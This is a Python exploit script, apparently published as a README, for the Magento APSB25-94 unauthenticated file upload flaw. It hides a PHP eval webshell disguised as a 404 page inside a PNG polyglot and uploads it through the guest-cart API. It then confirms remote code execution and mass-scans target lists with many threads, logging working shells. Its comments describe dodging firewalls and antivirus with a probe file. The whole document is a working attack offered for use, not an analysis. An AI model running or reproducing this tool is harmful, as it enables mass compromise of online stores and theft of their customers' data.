README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Magento APSB25-94 — Unauthenticated File Upload to RCE
Modified: Upload Godzilla webshell + multi-threaded batch scan
Usage: python3 magento_godzilla.py -f urls.txt [-t 20] [-p pass] [-k key]
"""
import requests
import base64
import random
import string
import struct
import zlib
import argparse
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urlparse
import threading
import sys
import functools
print = functools.partial(print, flush=True)
requests.packages.urllib3.disable_warnings()
# ─── Godzilla Webshell (PHP_EVAL_XOR_BASE64) ───
# 默认连接参数: pass=pass key=key
# Godzilla 客户端选择: PHP -> PhpEvalXor -> base64
# 一句话 eval shell(带 404 伪装)
SHELL_TEMPLATE = r"""<?php @error_reporting(0);if(!isset($_POST['{pass}'])){echo '<!DOCTYPE HTML><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>';exit;}eval($_POST['{pass}']);?>"""
# 无害探测文件 — 不含 eval/system/exec 等敏感函数,不触发 WAF/AV
# 仅 echo 一个标记字符串,用于确认:1) 文件上传成功 2) PHP 可执行
PROBE_TEMPLATE = r"""<?php echo 'PROBE_'.'OK_'.PHP_VERSION;?>"""
PROBE_MARKER = "PROBE_OK_"
SHELL_404_MARKER = "was not found on this server"
TINY_PNG = "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAAD0lEQVR4AQEEAPv/AHf66QRGAluYv6aFAAAAAElFTkSuQmCC"
JSON_HEADERS = {"Accept": "application/json", "Content-Type": "application/json"}
TIMEOUT = 30
counter_lock = threading.Lock()
stats = {"total": 0, "vuln": 0, "uploaded": 0, "fail": 0}
# 写文件锁 — 每条结果立刻落盘,Ctrl+C 也不丢数据
write_lock = threading.Lock()
output_path = None # main 里赋值
def queue_result(line):
"""立刻写一条结果到文件"""
with write_lock:
with open(output_path, "a", encoding="utf-8") as f:
f.write(line + "\n")
f.flush()
def flush_results():
"""兼容旧调用,现在每条都即时写了,这里什么都不做"""
pass
UPLOAD_PATHS = [
"/pub/media/custom_options/quote/{0}/{1}/{2}",
"/media/custom_options/quote/{0}/{1}/{2}",
]
def banner():
print("""
┌─────────────────────────────────────────────┐
│ Magento APSB25-94 Eval Shell Drop │
│ Unauthenticated File Upload → RCE │
└─────────────────────────────────────────────┘
""")
def make_png_polyshell(php_code: bytes) -> bytes:
"""纯 Python 构造 PNG polyshell
技巧:在合法 PNG 数据末尾(IEND 之后)追加 PHP 代码。
PNG 解析器忽略 IEND 之后的数据,图片校验通过。
PHP 解析器扫描整个文件,找到 <?php 标签后执行。
PNG 头部的二进制垃圾会被 PHP 当作 inline HTML 输出(无害),
但 <?php ?> 之间的代码会正常执行。
"""
sig = b'\x89PNG\r\n\x1a\n'
def make_chunk(chunk_type: bytes, data: bytes) -> bytes:
raw = chunk_type + data
return struct.pack('>I', len(data)) + raw + struct.pack('>I', zlib.crc32(raw) & 0xffffffff)
ihdr_data = struct.pack('>IIBBBBB', 1, 1, 8, 2, 0, 0, 0)
ihdr = make_chunk(b'IHDR', ihdr_data)
idat = make_chunk(b'IDAT', zlib.compress(b'\x00\xff\x00\x00'))
iend = make_chunk(b'IEND', b'')
# PHP 代码追加在 IEND 之后 — PNG 合法,PHP 可执行
return sig + ihdr + idat + iend + php_code
def build_payload(shell_code):
"""构造 PNG polyshell,无需 exiftool"""
filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + '.php'
png_bytes = make_png_polyshell(shell_code.encode('utf-8'))
return filename, base64.b64encode(png_bytes).decode()
def get_sku(session, base_url):
"""通过 GraphQL 获取任意商品 SKU"""
query = '{ products(search: "", pageSize: 1) { items { sku } } }'
resp = session.post(
f"{base_url}/graphql",
headers=JSON_HEADERS,
json={"query": query},
timeout=TIMEOUT,
verify=False
)
return resp.json()['data']['products']['items'][0]['sku']
def create_cart(session, base_url):
"""创建 guest 购物车,返回 cart_id"""
resp = session.post(
f"{base_url}/rest/default/V1/guest-carts",
headers=JSON_HEADERS,
timeout=TIMEOUT,
verify=False
)
return resp.json()
def upload_shell(session, base_url, cart_id, sku, b64_payload, filename):
"""通过 custom_options file_info 上传 polyshell"""
json_body = {
"cart_item": {
"product_option": {
"extension_attributes": {
"custom_options": [{
"extension_attributes": {
"file_info": {
"base64_encoded_data": b64_payload,
"name": filename,
"type": "image/png"
}
},
"option_id": "12345",
"option_value": "file"
}]
}
},
"qty": 1,
"sku": sku
}
}
resp = session.post(
f"{base_url}/rest/default/V1/guest-carts/{cart_id}/items",
headers=JSON_HEADERS,
json=json_body,
timeout=TIMEOUT,
verify=False
)
return resp
def check_shell(session, base_url, filename, shell_pass, **_):
"""探测上传后的 webshell 是否存在且可执行
判断逻辑:
GET → HTTP 200 + body 含伪装 404 = PHP 执行了
POST → eval 验证,echo 标记字符串确认 RCE
"""
for path_tpl in UPLOAD_PATHS:
url = base_url + path_tpl.format(filename[0], filename[1], filename)
try:
resp = session.get(url, timeout=TIMEOUT, verify=False)
if resp.status_code == 404:
continue
if resp.status_code == 200 and SHELL_404_MARKER in resp.text:
if '<?php' in resp.text and '@error_reporting' in resp.text:
return url, "UPLOADED_NOT_EXEC"
# eval 验证
verify_resp = session.post(
url,
data={shell_pass: 'echo "RCE_".php_uname();'},
timeout=TIMEOUT,
verify=False
)
if verify_resp.status_code == 200 and "RCE_" in verify_resp.text:
return url, "RCE_CONFIRMED"
else:
return url, "UPLOADED_MAYBE_EXEC"
if resp.status_code == 200:
if '<?php' in resp.text:
return url, "UPLOADED_NOT_EXEC"
return url, "UPLOADED_UNKNOWN"
except Exception:
continue
return None, None
def check_probe(session, base_url, filename):
"""检查探测文件是否存活 — 返回 (url, php_version) 或 (None, None)"""
for path_tpl in UPLOAD_PATHS:
url = base_url + path_tpl.format(filename[0], filename[1], filename)
try:
resp = session.get(url, timeout=TIMEOUT, verify=False)
if resp.status_code == 200 and PROBE_MARKER in resp.text:
ver = resp.text[resp.text.index(PROBE_MARKER) + len(PROBE_MARKER):]
ver = ver.split('<')[0].split('\n')[0].strip()
return url, ver
except Exception:
continue
return None, None
def test_target(base_url, shell_code, shell_pass, _unused_key, output_file):
"""单个目标完整测试流程:先投探测文件确认路径,再投 shell"""
base_url = base_url.rstrip('/')
host = urlparse(base_url).hostname
session = requests.Session()
session.headers.update({
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
})
try:
# Step 1: 获取 SKU
try:
sku = get_sku(session, base_url)
except Exception:
print(f" [-] {host} — SKU 获取失败,跳过")
with counter_lock:
stats["fail"] += 1
return
print(f" [+] {host} — SKU: {sku}")
# Step 2: 创建购物车
try:
cart_id = create_cart(session, base_url)
except Exception:
print(f" [-] {host} — 购物车创建失败")
with counter_lock:
stats["fail"] += 1
return
# Step 3: 先投探测文件(无害,不会被杀)
probe_code = PROBE_TEMPLATE
probe_name, probe_b64 = build_payload(probe_code)
try:
upload_shell(session, base_url, cart_id, sku, probe_b64, probe_name)
except Exception:
pass
time.sleep(0.3)
probe_url, php_ver = check_probe(session, base_url, probe_name)
if probe_url:
print(f" [+] {host} — 探测文件存活! PHP {php_ver} | {probe_url}")
# Step 4: 探测成功,再投 eval shell
try:
cart_id2 = create_cart(session, base_url)
except Exception:
print(f" [-] {host} — 第二次购物车创建失败")
with counter_lock:
stats["fail"] += 1
return
shell_name, shell_b64 = build_payload(shell_code)
try:
upload_shell(session, base_url, cart_id2, sku, shell_b64, shell_name)
except Exception as e:
print(f" [-] {host} — Shell 上传失败: {e}")
with counter_lock:
stats["fail"] += 1
return
time.sleep(0.3)
shell_url, status = check_shell(session, base_url, shell_name, shell_pass)
if shell_url and status == "RCE_CONFIRMED":
print(f" [!!] {host} — RCE 确认! Shell: {shell_url}")
print(f" [!!] 连接: POST {shell_pass}=phpinfo();")
with counter_lock:
stats["vuln"] += 1
stats["uploaded"] += 1
queue_result(f"RCE_CONFIRMED | {shell_url} | param={shell_pass} | PHP={php_ver}")
elif shell_url:
print(f" [!] {host} — Shell 上传但可能被杀: {shell_url} ({status})")
# 探测文件活着说明路径可达,shell 被杀了记录探测 URL 作为备用
with counter_lock:
stats["vuln"] += 1
queue_result(f"SHELL_KILLED | {shell_url} | probe={probe_url} | PHP={php_ver}")
else:
# shell 文件不存在但探测文件在 — 大概率 eval 被 WAF 拦截
print(f" [!] {host} — Shell 被拦截,但探测文件存活(可手动投马)")
print(f" [!] {host} — 探测URL: {probe_url}")
with counter_lock:
stats["vuln"] += 1
queue_result(f"PROBE_ONLY | probe={probe_url} | PHP={php_ver} | shell_blocked")
else:
# 探测文件也没落地 — 不受影响或已打补丁
print(f" [-] {host} — 探测文件未落地,不受影响")
with counter_lock:
stats["fail"] += 1
except Exception as e:
print(f" [-] {host} — 异常: {e}")
with counter_lock:
stats["fail"] += 1
def main():
banner()
parser = argparse.ArgumentParser(description="Magento APSB25-94 Eval Shell Batch Scanner")
parser.add_argument('-f', '--file', required=True, help="URL 列表文件,每行一个")
parser.add_argument('-t', '--threads', type=int, default=10, help="并发线程数 (默认 10)")
parser.add_argument('-p', '--password', default='pass', help="Shell POST 参数名 (默认 pass)")
parser.add_argument('-k', '--key', default='', help="(保留参数,eval 模式不需要)")
parser.add_argument('-o', '--output', default='shells.txt', help="输出文件 (默认 shells.txt)")
args = parser.parse_args()
global output_path
output_path = args.output
# 生成 webshell — 用 replace 而非 format 避免大括号冲突
shell_code = SHELL_TEMPLATE.replace(
"{{", "\x00LBRACE\x00"
).replace(
"}}", "\x00RBRACE\x00"
).replace(
"{pass}", args.password
).replace(
"{key}", args.key
).replace(
"\x00LBRACE\x00", "{"
).replace(
"\x00RBRACE\x00", "}"
)
# 读取目标,自动补 scheme
urls = []
with open(args.file, 'r') as f:
for line in f:
line = line.strip()
if not line or line.startswith('#'):
continue
if not line.startswith('http://') and not line.startswith('https://'):
urls.append('https://' + line)
urls.append('http://' + line)
else:
urls.append(line)
# 去重
urls = list(dict.fromkeys(urls))
print(f"[*] 目标数: {len(urls)} 线程数: {args.threads}")
print(f"[*] Shell 参数名: {args.password}")
print(f"[*] 输出文件: {args.output}")
print(f"[*] {'='*50}")
with counter_lock:
stats["total"] = len(urls)
with ThreadPoolExecutor(max_workers=args.threads) as executor:
futures = {
executor.submit(test_target, url, shell_code, args.password, args.key, args.output): url
for url in urls
}
for future in as_completed(futures):
try:
future.result()
except Exception as e:
print(f" [-] 线程异常: {e}")
# 刷盘残余
flush_results()
# 汇总
print(f"\n{'='*50}")
print(f"[*] 扫描完成")
print(f" 总目标: {stats['total']}")
print(f" 存在漏洞: {stats['vuln']}")
print(f" RCE/Shell可用: {stats['uploaded']}")
print(f" 失败/不受影响: {stats['fail']}")
if stats['vuln'] > 0:
print(f" 结果已保存: {args.output}")
if __name__ == "__main__":
main()